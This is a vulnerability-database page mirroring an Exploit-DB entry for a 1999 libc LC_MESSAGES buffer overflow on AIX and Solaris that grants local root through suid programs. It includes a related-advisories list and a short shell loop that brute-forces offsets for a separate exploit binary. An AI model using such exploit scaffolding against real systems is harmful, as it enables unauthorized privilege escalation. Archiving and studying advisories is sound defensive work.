Lucene search
+L

IBM AIX 4.2.1 / Sun Solaris 7.0 - LC_MESSAGES libc Buffer Overflow (1)

🗓️ 22 May 1999 00:00:00Reported by UNYUN@ShadowPenguinSecurityType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 28 Views

Buffer overflow in libc allows local users to exploit suid root programs for root access.

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-1999-0767
4 Feb 200005:00
cve
cvelist
Cvelist
CVE-1999-0767
4 Feb 200005:00
cvelist
exploitdb
Exploit DB
IBM AIX 4.2.1 / Sun Solaris 7.0 - LC_MESSAGES libc Buffer Overflow (2)
22 May 199900:00
exploitdb
exploitdb
Exploit DB
IBM AIX 4.2.1 / Sun Solaris 7.0 - LC_MESSAGES libc Buffer Overflow (3)
22 May 199900:00
exploitdb
exploitdb
Exploit DB
IBM AIX 4.2.1 / Sun Solaris 7.0 - LC_MESSAGES libc Buffer Overflow (4)
22 May 199900:00
exploitdb
exploitdb
Exploit DB
IBM AIX 4.2.1 / Sun Solaris 7.0 - LC_MESSAGES libc Buffer Overflow (5)
22 May 199900:00
exploitdb
euvd
EUVD
EUVD-1999-0748
7 Oct 202500:30
euvd
nvd
NVD
CVE-1999-0767
8 Sep 199904:00
nvd
ptsecurity
Positive Technologies
PT-1999-1338 · Oracle · Solaris
8 Sep 199900:00
ptsecurity
redhatcve
RedhatCVE
CVE-1999-0767
21 May 202518:12
redhatcve
Rows per page
source: https://www.securityfocus.com/bid/268/info

A buffer overflow in libc's handling of the LC_MESSAGES environment variable allows a malicious user to exploit any suid root program linked agains libc to obtain root privileges. This problem is found in both IBM's AIX and Sun Microsystem's Solaris. This vulnerability allows local users to gain root privileges.

#!/bin/ksh
L=3000
STEP=34
MAX=16000
while [ $L -lt $MAX ]
do
./a.out $L
L=`expr $L + $STEP`
done

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Jan 2014 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.2
EPSS0.01197
28